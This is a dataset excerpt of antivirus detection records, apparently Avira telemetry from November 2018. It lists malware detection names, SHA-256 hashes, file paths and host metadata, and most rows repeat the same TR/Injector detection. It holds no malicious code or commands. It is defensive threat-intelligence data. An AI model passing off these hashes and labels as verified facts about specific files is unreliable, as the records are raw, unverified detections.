  Row(detection=Row(filename='avscan-20181102-120400-0a6b4efa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120400-0A6B4EFA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181031T191500-01165/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054635-a116d9dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054635-A116D9DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052845-23534ec3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052845-23534EC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054259-202d4da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054259-202D4DA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fbzbgdee.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\FBZBgDeE.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152229-49f6fd8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152229-49F6FD8E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:25:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061236-43e3a042', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061236-43E3A042', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061254-4e5d065a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061254-4E5D065A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073113-baeb68f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e5507ae\\AVSCAN-20181102-072706-82C0C513\\AVSCAN-20181102-073113-BAEB68F1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='52ddc21dd94dffdfaf2cff0bef8e20129f46d2a0594af38c71b68ad3da57153e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:01:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120321-062df6e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120321-062DF6E8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-083021-86765cd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e56a5c3\\AVSCAN-20181101-082944-80AFD921\\AVSCAN-20181101-083021-86765CD4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095924-f9052089', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0be534e1\\AVSCAN-20181102-095853-F46D9B58\\AVSCAN-20181102-095924-F9052089', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:59:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050315-9383d760', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050315-9383D760', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060652-766d95f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060652-766D95F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060806-a2d3fc9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060806-A2D3FC9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055048-37e62a60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055048-37E62A60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051017-8eeb448f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051017-8EEB448F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055328-9722c78c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055328-9722C78C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052949-49c7ec8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052949-49C7EC8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060407-14352cbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060407-14352CBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060020-8ce30333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060020-8CE30333', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051052-a3a7bbef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051052-A3A7BBEF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054036-cb62dd50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054036-CB62DD50', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060655-785e0576', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060655-785E0576', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052755-05a59902', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052755-05A59902', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055144-598d9d00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055144-598D9D00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061027-f6bb10a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061027-F6BB10A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054003-b787b984', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054003-B787B984', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052409-7efa8209', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052409-7EFA8209', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053805-713ba02b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053805-713BA02B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053532-15c77074', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053532-15C77074', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051623-68e4b905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-68E4B905', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060642-70859ab2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060642-70859AB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054612-939b4210', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054612-939B4210', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053459-020f4e8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053459-020F4E8E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052856-2a31aa48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052856-2A31AA48', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060315-f56eb7c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060315-F56EB7C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_117a88dc.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_117a88dc.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055940-75228f97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055940-75228F97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060145-bfc8b662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060145-BFC8B662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050518-dce58b25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050518-DCE58B25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131812-b0a5c249', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_33eb8752\\AVSCAN-20181102-131756-ADDBC247\\AVSCAN-20181102-131812-B0A5C249', filesize=2880000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='81c889ee3b6c7b687a3d6406c1b5eb8bb7f84195ba1e501f85838a4b6d874e11', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051906-ca0933b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051906-CA0933B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055404-ad015010', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055404-AD015010', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050809-42c0826e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050809-42C0826E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054348-3dd24534', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054348-3DD24534', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062258-b69c0adc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062258-B69C0ADC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='7e59ec1097acb9cbb852cf8ed34c754f9d8f2d9d27c6dd1ae4d718bd0a18dd15', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054105-dc9459d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054105-DC9459D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055848-56136cb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055848-56136CB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:47Z'), dt=datetime.date(2018, 11, 2)),
